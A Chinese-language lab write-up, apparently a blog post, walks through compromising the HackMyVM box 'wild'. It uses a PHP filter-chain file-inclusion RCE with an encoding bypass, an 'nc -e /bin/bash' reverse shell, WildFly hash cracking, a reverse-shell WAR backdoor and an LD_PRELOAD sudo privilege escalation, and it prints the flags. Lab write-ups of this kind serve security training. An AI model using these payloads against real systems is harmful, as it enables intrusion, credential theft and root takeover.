lcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfQp9Cj8+Cg==

解码一下：

  
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Food</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" />
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" />
    <link rel="stylesheet" href="css/flaticon.css" />
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/bootsnav.css">
    <link rel="stylesheet" href="css/color.css">
    <link rel="stylesheet" href="css/custom.css" />
</head>
<body data-spy="scroll" data-target="#navbar-menu" data-offset="100">
    <nav class="navbar navbar-default bootsnav no-background navbar-fixed black">
        <div class="container">
            <div class="navbar-header">
                <a class="navbar-brand" href="#"><img src="images/logo.png" class="logo" alt=""></a>
            </div>
        </div>
    </nav>
    <section id="block">
        <div class="container">
            <div class="row">
                <div class="col-md-8 col-md-offset-2">
                    <div class="feature">
                        <h1>Welcome !</h1>
			<p style="color: red; font-weight: bold;font-size: 24px;">Choose a recipe :</p>
                        <ul class="list-group">
                            <li class="list-group-item"><a href="?file=fatty-burger.php">Fatty Burger</a></li>
                            <li class="list-group-item"><a href="?file=shack-burger.php">Shack Burger</a></li>
                            <li class="list-group-item"><a href="?file=cheddar-burger.php">Cheddar Junky Stuffed Burgers</a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <script src="http://code.jquery.com/jquery-1.12.1.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
    <script src="js/bootsnav.js"></script>
</body>
</html>


<?php
ini_set('allow_url_include', '0');

function isForbidden($input) {
    return stripos($input, "iconv") !== false;
}

if(isset($_GET['file'])) {
    $file = $_GET['file'];

    if (isForbidden($file)) {
        echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";
    } elseif (strncmp($file, "/", 1) !== 0 && strncmp($file, "..", 2) !== 0) {
        @include($file);
    } else {
        echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";
    }
}
?>

对iconv,/,..进行了过滤，尝试生成一个filter链写入马：https://github.com/synacktiv/php_filter_chain_generator

尝试生成一个短一点的链，上次太长了输入不了：

python3 ./php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'

  
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp?0=whoami

但是这样是不够的，上面禁止了iconv，我们还得进行二次编码以绕过：

i的十六进制编码方式为%69,%的十六进制编码为%25，这里如果只编码一次，仍然会被浏览器识别为iconv，从而被拦截。

iconv
%2569conv

http://10.161.16.19/recipe.php?file=php://filter/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami

尝试一下：

反弹shell

出现www-data，尝试反弹shell：

nc -e /bin/bash 10.160.220.139 1234

提权

扩展shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息搜集

  
www-data@wild:/var/www/html$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wild:/var/www/html$ ls -la
ls -la
total 68
dr-xr-xr-x 7 root     root      4096 Nov  4 14:01 .
drwxr-xr-x 3 root     root      4096 Nov  1 09:49 ..
drwxrwxr-x 3 www-data www-data  4096 Nov  1 19:24 __MACOSX
-rwx------ 1 www-data www-data    22 Nov  1 19:24 about.php
-rwx------ 1 www-data www-data  1586 Nov  1 19:24 cheddar-burger.php
drwxr-xr-x 2 www-data www-data  4096 Nov  1 19:24 css
-rwx------ 1 www-data www-data  1897 Nov  1 19:24 fatty-burger.php
drwxr-xr-x 2 www-data www-data  4096 Nov  1 19:24 fonts
drwxr-xr-x 2 www-data www-data  4096 Nov  1 19:24 images
-rwx------ 1 www-data www-data 19390 Nov  1 19:24 index.php
drwxr-xr-x 2 www-data www-data  4096 Nov  1 19:24 js
-rwx------ 1 www-data www-data  2626 Nov  1 19:24 recipe.php
-rwx------ 1 www-data www-data  1582 Nov  1 19:24 shack-burger.php
www-data@wild:/var/www/html$ cd ../
cd ../
www-data@wild:/var/www$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov  1 09:49 .
drwxr-xr-x 12 root root 4096 Oct 23 09:25 ..
dr-xr-xr-x  7 root root 4096 Nov  4 14:01 html
www-data@wild:/var/www$ cd ../;ls -la
cd ../;ls -la
total 48
drwxr-xr-x 12 root root  4096 Oct 23 09:25 .
drwxr-xr-x 18 root root  4096 Jul 22  2023 ..
drwxr-xr-x  2 root root  4096 Nov  3 09:31 backups
drwxr-xr-x 14 root root  4096 Oct 23 12:28 cache
drwxr-xr-x 35 root root  4096 Oct 23 12:28 lib
drwxrwsr-x  2 root staff 4096 Mar  2  2023 local
lrwxrwxrwx  1 root root     9 Jun 15  2023 lock -> /run/lock
drwxr-xr-x  9 root root  4096 Mar 29 04:30 log
drwxrwsr-x  2 root mail  4096 Jun 15  2023 mail
drwxr-xr-x  2 root root  4096 Jun 15  2023 opt
lrwxrwxrwx  1 root root     4 Jun 15  2023 run -> /run
drwxr-xr-x  4 root root  4096 Jun 15  2023 spool
drwxrwxrwt  2 root root  4096 Mar 29 05:35 tmp
drwxr-xr-x  3 root root  4096 Nov  1 09:49 www
www-data@wild:/var$ mail
mail
bash: mail: command not found
www-data@wild:/var$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/polkit-1/polkit-agent-helper-1
www-data@wild:/var$ cat cron*
cat cron*
cat: 'cron*': No such file or directory
www-data@wild:/var$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }

毛都没有，继续找其他用户吧，查看一下8080端口：

寻找配置文件

WildFly是一个基于JavaEE的开源轻量级应用服务器。它提供了运行Java Web应用程序所需的所有功能，是JVM的扩展，具有完整的运行时环境，能够在一端创建数据库到另一端的Web客户端的连接。WildFly由Red Hat设计和维护，其正式名称为JBoss AS。
作为一个全功能的应用服务器，WildFly具有无与伦比的速度，包括快速启动、无限的网络性能和可扩展性。同时，它非常轻量级，具有瘦内存管理和可定制的运行时间。WildFly还具有强大的管理能力，包括统一的配置和管理。这些特点使得WildFly能够缩短开发时间，更有效地管理资源，并为用户节省资金。
此外，WildFly是一个灵活的容器和服务器，用于管理EJB，但JBoss核心服务并不包括支持servlet/JSP的WEB容器，因此一般与Tomcat或Jetty绑定使用。总的来说，WildFly为Java Web应用程序的开发和部署提供了一个强大的、灵活的和开源的平台。

有一个登录界面需要账号密码，而前面又有一个文件包含，自然而然想到去读取配置文件，所以我们要翻看手册找一下配置文件在哪，或者直接google：

得到了一个大概的地址：

 \{ jboss.home}/standalone/configuration/mgmt-users.properties
 \{ jboss.home}/domain/configuration/mgmt-users.properties

之前我们拿到了shell，尝试搜索一下相关文件：

  
find / -name mgmt-users.properties 2>/dev/null
# /opt/wildfly/standalone/configuration/mgmt-users.properties
# /opt/wildfly/domain/configuration/mgmt-users.properties

这里如果权限实在不够，就在/etc和/opt分别搜索

直接读取：

  
</wildfly/domain/configuration/mgmt-users.properties
#
# Properties declaration of users for the realm 'ManagementRealm' which is the default realm
# for new installations. Further authentication mechanism can be configured
# as part of the <management /> in host.xml.
#
# Users can be added to this properties file at any time, updates after the server has started
# will be automatically detected.
#
# By default the properties realm expects the entries to be in the format: -
# username=HEX( MD5( username ':' realm ':' password))
#
# A utility script is provided which can be executed from the bin folder to add the users: -
# - Linux
#  bin/add-user.sh
#
# - Windows
#  bin\add-user.bat
#
#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.
#
# On start-up the server will also automatically add a user $local - this user is specifically
# for local tools running against this AS installation.
#
# The following illustrates how an admin user could be defined, this
# is for illustration only and does not correspond to a usable password.
#
administrator=3bfa7f34174555fe766d0e0295821742

hash碰撞得到密码

用户名和域都给了：

username 	administrator
realm  		ManagementRealm

尝试编写脚本，对这个 hash 进行碰撞，老样子，使用rockyou作为字典：

  
import hashlib

username = "administrator"
realm = "ManagementRealm"
target_hash = "3bfa7f34174555fe766d0e0295821742"

with open('rockyou.txt','r', errors = "ignore") as dic:
    for i in dic:
        i = i.strip()
        if hashlib.md5(f"{username}:{realm}:{i}".encode()).hexdigest() == target_hash:
            print("[+] I got it!",i)
            break

katarina9

登录一下：

上传war马（沃尔玛？）

找到一处上传地方：

似乎上传war，直接使用之前的蚁剑war马，发现删掉了，使用工具生成一个：

  
godofwar -p reverse_shell -H 10.160.220.139 -P 1234 -o wild

[ ℹ ] Creating Directory Structure:
  ✔ wild
  ✔ wild/WEB-INF
  ✔ wild/META-INF
  ✔ wild/WEB-INF/web.xml
  ✔ wild/META-INF/MANIFEST.MF
[ ℹ ] Setting up payload:
  ✔ reverse_shell.jsp ⟿ wild.jsp
  ✔ wild/wild.jsp
[ ℹ ] Cleaning up
[ ✔ ] Backdoor wild.war has been created.

上传：

访问触发：

提权

扩展shell

  
python3 -V
# Python 3.11.2
python3 -c 'import pty;pty.spawn("/bin/bash")'
# tod@wild:/opt/wildfly/bin$ 

信息搜集

  
tod@wild:/opt/wildfly/bin$ whoami;id
whoami;id
tod
uid=1002(tod) gid=1002(tod) groups=1002(tod),100(users)
tod@wild:/opt/wildfly/bin$ sudo -l
sudo -l
Matching Defaults entries for tod on wild:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User tod may run the following commands on wild:
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/info
tod@wild:/opt/wildfly/bin$ cd /usr/bin
cd /usr/bin
tod@wild:/usr/bin$ file info
file info
info: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62cd90c757a2254b5e4ead585f3564d47fa0c86f, for GNU/Linux 3.2.0, stripped

传过来看看：

  
python3 -m http.server 8888
wget http://10.161.16.19:8888/info -O "$env:USERPROFILE\Desktop\info"

逆向分析

ida64打开看一下，我滴个乖乖，1000多行：

果断放弃，运行一下试试：

./info
info: Terminal type '(null)' is not smart enough to run Info

重新回顾一下，发现可以设置环境变量（setenv）

信息搜集

先看看环境变量以及其他的信息吧：

  
echo $PATH
find / -type -writables 2>/dev/null

似乎没有啥有用的线索。

劫持链接库

尝试查看一下这个setenv是否可以利用：https://book.hacktricks.xyz/linux-hardening/privilege-escalation#setenv

LD_PRELOAD环境变量用于指定加载程序在所有其他库（包括标准 C 库 ( libc.so)）之前加载一个或多个共享库（.so 文件）。此过程称为预加载库。
但是，为了维护系统安全并防止此功能被利用，特别是对于suid/sgid可执行文件，系统会强制执行某些条件：
对于真实用户 ID ( ruid ) 与有效用户 ID ( euid )不匹配的可执行文件，加载程序会忽略LD_PRELOAD。
对于具有 suid/sgid 的可执行文件，仅预加载标准路径中也是 suid/sgid 的库。

创建恶意代码

  
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

编译并传至靶机：

  
# kali
vim exp.c
gcc -fPIC -shared -o exp.so exp.c -nostartfiles
# exp.c: In function ‘_init’:
# exp.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
#     7 |     setgid(0);
#       |     ^~~~~~
# exp.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
#     8 |     setuid(0);
#       |     ^~~~~~
python3 -m http.server 8888

  
# tod
cd /tmp
wget http://10.160.220.139:8888/exp.so
sudo LD_PRELOAD=./exp.so /usr/bin/info

拿到root！

d8592e5a179d4b80e099f4c9a460c6e4

再回头找一下userflag：

  
root@wild:~# cd /home
cd /home
root@wild:/home# ls
ls
tod
root@wild:/home# cd tod;ls -la
cd tod;ls -la
total 40
drwx------  5 tod  tod  4096 Nov  4 14:08 .
drwxr-xr-x  3 root root 4096 Oct 13 07:16 ..
-rw-r--r--  1 tod  tod   220 Oct 12 19:59 .bash_logout
-rw-r--r--  1 tod  tod  3526 Oct 12 19:59 .bashrc
drwx------  3 tod  tod  4096 Nov  1 18:11 .gnupg
drwxr-xr-x 12 tod  tod  4096 Oct 12 20:00 .oh-my-zsh
-rw-r--r--  1 tod  tod   807 Oct 12 19:59 .profile
drwx------  2 tod  tod  4096 Nov  4 13:51 .ssh
-rwx------  1 tod  tod    33 Nov  1 19:05 user.txt
-rw-r--r--  1 tod  tod  3890 Oct 12 19:59 .zshrc
root@wild:/home/tod# cat user.txt
cat user.txt
c1cc7f5179a168ec93095695f20c9e3f

参考blog

https://www.anquanke.com/post/id/202510

https://tr0jan.top/archives/78/

https://blog.csdn.net/qq_34942239/article/details/136500226

Training platform, Hackmyvm

Hackmyvm web

本文由作者按照 CC BY 4.0 进行授权

wild

信息搜集

扫描开放端口

实地勘探

目录扫描

漏洞挖掘

查看敏感目录

神魔情况

文件包含

filter链提取文件

反弹shell

提权

扩展shell

信息搜集

寻找配置文件

hash碰撞得到密码

上传war马（沃尔玛？）

提权

扩展shell

信息搜集

逆向分析

信息搜集

劫持链接库

创建恶意代码

参考blog

热门标签